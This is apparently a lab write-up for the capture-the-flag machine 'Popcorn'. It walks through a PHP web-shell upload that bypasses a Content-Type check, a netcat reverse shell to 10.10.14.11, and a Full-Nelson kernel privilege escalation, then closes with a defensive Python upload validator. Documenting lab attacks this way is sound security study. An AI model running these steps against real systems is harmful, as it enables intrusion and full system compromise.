Popcorn
Popcorn - 10.10.10.6
Target Enumeration:
OS: Linux
IP: 10.10.10.6
User: 5e36a919398ecc5d5c110f2d865cf136
Root: f122331023a9393319a0370129fd9b14
Ports / Services / Software Versions Running
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
Vulnerability Exploited:
The photo upload allows remote code execution: a malicious PHP file is accepted when the request is modified with Burp.
Privilege escalation
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
https://www.exploit-db.com/exploits/14339/
Exploiting the host:
Nmap
Dirb found /torrent
Appears to be a torrent hosting application
Application allows users to sign up and upload torrents.
Find a clean torrent file (I used Debian).
Upload it to the app.
Edit the torrent once it is uploaded.
The vulnerable point is the photo section, so find a simple backdoor PHP shell.
Rename it to shell.jpg.php and upload the shell to the app. Catch the request in Burp.
Change content type to: Content-Type: image/jpg
The upload succeeded.
Inspect the image from the webapp to find the true path.
Visit the true path and issue ?cmd=id after the .php extension.
Looking in /bin we see nc is installed.
Set a listener on port 443 and execute nc -e /bin/bash 10.10.14.11 443 via the browser.
Now you have a shell.
Move to /dev/shm and download enumeration scripts.
Google the kernel for privesc opportunities.
Run further tools while researching kernel exploits.
Based on the uname -a output, the easiest way may be Full Nelson.
Download it from Exploit-DB:
wget https://www.exploit-db.com/download/15704.c
Now, on Popcorn, download and compile the exploit, then run it to get root.
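The photo upload described above was accepted because the check trusted the client-supplied Content-Type and allowed a double extension. The sketch below is an added example, not code from the application or from this write-up; the function names, the allowlist and the sample uploads are assumptions constructed for illustration.

```python
import os
import secrets

# Magic-byte signatures for the image types the photo form should accept.
IMAGE_SIGNATURES = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample uploads: (filename, client-declared type, body).
PHP_UPLOAD = ("shell.jpg.php", "image/jpg", b"<?php /* placeholder */ ?>")
DISGUISED = ("cover.jpg", "image/jpeg", b"<?php /* placeholder */ ?>")
REAL_JPEG = ("cover.jpg", "image/jpeg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")


def weak_check(filename, declared_type, data):
    """Flawed pattern: accepts whatever Content-Type the client sends."""
    return declared_type in ("image/jpg", "image/jpeg", "image/png", "image/gif")


def hardened_check(filename, declared_type, data):
    """Return a server-chosen storage name, or None to reject the upload."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    # Exactly one extension, and it must be allowlisted.
    # "shell.jpg.php" has two, so it is rejected here.
    if len(parts) != 2 or parts[1] not in IMAGE_SIGNATURES:
        return None
    # declared_type is ignored; the body must match the claimed extension.
    if not data.startswith(IMAGE_SIGNATURES[parts[1]]):
        return None
    # Never reuse the client's filename on disk.
    return f"{secrets.token_hex(16)}.{parts[1]}"


if __name__ == "__main__":
    for sample in (PHP_UPLOAD, DISGUISED, REAL_JPEG):
        print(sample[0], weak_check(*sample), hardened_check(*sample))
```

Magic bytes alone do not stop a file that begins with a valid image header and carries script content afterwards; the extension allowlist, the server-chosen name and an upload directory where the web server does not execute scripts are what prevent execution.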